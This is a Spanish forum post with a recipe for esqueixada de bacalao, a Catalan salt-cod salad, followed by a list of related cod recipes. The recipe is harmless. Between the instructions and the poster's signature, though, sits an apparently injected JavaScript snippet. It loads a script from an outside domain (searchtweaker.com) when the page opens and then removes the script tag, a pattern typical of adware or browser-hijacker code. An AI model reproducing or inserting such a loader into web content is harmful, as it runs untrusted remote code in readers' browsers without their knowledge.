Esqueixada de bacalao
Página 1 de 1.
Esqueixada de bacalao
[Tienes que estar registrado y conectado para ver esa imagen]
Introducción:
Este plato es típico en Cataluña
Ingredientes:
- 500 gr. de bacalao
- 4 tomates maduros
- 1 cebolla
- aceitunas negras
- 1 vaso de aceite de oliva
- pimienta negra
- 2 pimientos verdes estrechos
- perejil
Instrucciones:
Desmenuzar el bacalao y ponerlo en remojo unos 30 min.
Cambiar el agua hasta que este en el punto de sazon.
Escurrirlo bien con las manos, colocarlo en una fuente y añadirle cebolla cortada en tiras finas y las aceitunas.
Pelar los tomates y cortarlos en trozos pequeños, los pimientos verdes en rodajas, añadir el bacalao.
Espolvorear con perejil picado, pimienta, aceite y conservar en frio 1 hora antes de comerlo.
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Lilith
Temas similares
» Bacalao al horno
» Paella de bacalao
» Bacalao a la almendra
» Fantasía de bacalao con cebolla
» volován de bacalao con alcachofas
» Paella de bacalao
» Bacalao a la almendra
» Fantasía de bacalao con cebolla
» volován de bacalao con alcachofas
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.